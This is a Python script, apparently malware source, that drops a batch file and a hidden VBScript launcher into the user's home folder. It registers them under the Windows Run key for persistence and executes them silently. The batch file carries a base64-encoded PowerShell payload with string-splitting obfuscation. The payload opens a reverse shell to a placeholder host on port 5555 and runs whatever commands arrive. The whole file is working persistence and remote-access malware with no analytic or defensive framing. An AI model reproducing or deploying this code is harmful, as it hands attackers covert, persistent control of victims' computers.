import subprocess

import os




# Get the home directory of the current user
home_directory = os.path.expanduser("~")

# Define the path for the batch file in the home directory
batch_file_path = os.path.join(home_directory, 'Keres.bat')

# Define the path for the VBScript file
vbs_script_path = os.path.join(home_directory, 'ExecKeres.vbs')

# Create the VBScript content with the dynamic batch file path
vbs_script_content = f'''
Set objShell = CreateObject("WScript.Shell")


batchFilePath = "{batch_file_path}"


objShell.Run batchFilePath, 0, True
'''






#""""""""""""""""""""""""""""""""""""""""""""""""""
ps_command = ''' ZQBjAGgAbwAgACcAaABlAGwAbABvACAAaQAgAGEAbQAgAG0AZQByAGkAawBoACcAIAA7ACAAJAB1AG4AaQBxAHUAZQBJAGQAZQBuAHQAaQBmAGkAZQByACAAPQAgACIASwBlAHIAZQBzACIAIAA7AHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAIAB7ACAACgAgACAAIAAgACAAIAAgACAAJABtAHUAdABlAHgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAaAByAGUAYQBkAGkAbgBnAC4ATQB1AHQAZQB4ACgAJABmAGEAbABzAGUALAAgACQAbQB1AHQAZQB4AE4AYQBtAGUAKQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAbQB1AHQAZQB4AC4AVwBhAGkAdABPAG4AZQAoADAALAAgACQAZgBhAGwAcwBlACkAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB0AHIAeQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBzAFIAdQBuAG4AaQBuAGcAIAA9ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AQwBvAG0AbQBhAG4AZABMAGkAbgBlACAALQBsAGkAawBlACAAIgAqACQAdQBuAGkAcQB1AGUASQBkAGUAbgB0AGkAZgBpAGUAcgAqACIAIAB9ADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgALQBuAG8AdAAgACQAaQBzAFIAdQBuAG4AaQBuAGcAKQAgAHsAIAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABQAFMASABPAE0ARQBcAHAAbwB3AGUAJwAnAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAewAkAHUAbgBpAHEAdQBlAEkAZABlAG4AdABpAGYAaQBlAHIAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwAnACcAdABlAG0ALgBOACcAJwBlAHQALgBTAG8AYwBrACcAJwBlAHQAcwAuAFQAQwBQAEMAbAAnACcAaQBlAG4AdAAoACcAagBqAGoAagAnACwANQA1ADUANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAMAA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAJwAnAHkAcwB0AGUAbQAuAFQAJwAnAGUAeAB0AC4AQQBTACcAJwBDAEkASQBFACcAJwBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAJwA+ACAAJwA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZAAnACcAZABlAG4AIAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFMAYwByAGkAcAB0ACAAaQBzACAAYQBsAHIAZQBhAGQAeQAgAHIAdQBuAG4AaQBuAGcALgAiAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9ADsAIAAgAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAgAGYAaQBuAGEAbABsAHkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG0AdQB0AGUAeAAuAFIAZQBsAGUAYQBzAGUATQB1AHQAZQB4ACgAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACgAgACAAIAAgACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQQBuAG8AdABoAGUAcgAgAGkAbgBzAHQAYQBuAGMAZQAgAGkAcwAgAGEAbAByAGUAYQBkAHkAIAByAHUAbgBuAGkAbgBnAC4AIgAKACAAIAAgACAAIAAgACAAIAB9ACAACgAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwACAACgAgACAAIAAgAH0A'''
#stp



# """"""""""""""f'reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Merikh /t REG_SZ /d \\C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand {encoded_ps_command}',
powershell_com =f'''New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Keres" -Value "{batch_file_path}"'''


command=f'''@echo off 
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand {ps_command}
'''

    

# """"""""""""""""""
try:
    #subprocess.run(["powershell", "-NoProfile", "-ExecutionPolicy", "Bypass","-EncodedCommand", encoded_ps_command], shell=True)
    #subprocess.run(["powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", powershell_com], shell=True)
    subprocess.run(args=["reg", "add", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                       "/v", "Keres", "/t", "REG_SZ", "/d", f"{vbs_script_path}", "/f"], shell=True)
    with open(batch_file_path, 'w') as batch_file:
        batch_file.write(command)
    with open(vbs_script_path, 'w') as vbs_script:
        vbs_script.write(vbs_script_content)

    print(f"VBScript file created at: {vbs_script_path}")
    # Execute the batch file
    subprocess.run(["wscript", vbs_script_path])
       
    print("PowerShell command executed successfully.")
except subprocess.CalledProcessError as e:
    print("Error executing PowerShell command:", e)